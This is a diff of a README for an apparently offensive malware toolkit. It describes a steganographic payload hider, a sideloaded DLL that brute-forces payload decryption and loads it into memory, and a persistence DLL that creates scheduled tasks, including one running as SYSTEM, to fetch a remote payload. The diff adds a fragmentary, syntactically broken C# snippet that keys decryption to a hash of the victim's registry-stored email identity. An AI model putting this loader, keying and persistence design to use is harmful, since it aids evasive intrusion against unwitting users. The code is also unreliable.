MelloSec/Moodring/README.md

  .\Cryptorchid.exe -nodns -desteg  .\nogo_copy.png
 ```

-### BrutesyCollins - Decrypts payload from encrypted text file using hash stored in image
+### Decryptorchid - Decrypts payload from encrypted text file using hash stored in image
 Sideloading DLL, bruteforces the payloads decryption and loads target into memory, invoking your desired method.

-TODO: Have this an encyrpoted value we can pull as well from another image, get rid of the text file.
+TODO: Have this an encrypted value we can pull as well from another image, get rid of the text file.
+TODO: if O365, keying off the email is possible since regkey can be used that contains users email.
+ Query Key > Hash Value > Store Hash and Compare against our stored value, if match, decrypt.

+string storedHashValue = "";
+ string regValue = Microsoft.Win32.Registry.GetValue(@"HKEY_CURRENT_USER\", "upn" null);
+string upnName = (string)regValue;
+ string hashedUpnValue = GetSHA256Hash(upnName);
+ bool correctKey = hashedUpnValue.Equals(storedHashValue);
+ if (correctKey){
+    var rawPayload = rc4EncDecrypt(Encoding.UTF8.GetBytes(payload), upnName);
+ }
+ // run that motha

+ Nope, target the ost/nst file instead, regkey incosistent.

 ### Taskmasker
 Persister DLL, checks users permissions and creates a task, fetching a remote payload to an AppData directory.
 If admin, two tasks are created, one to run as SYSTEM.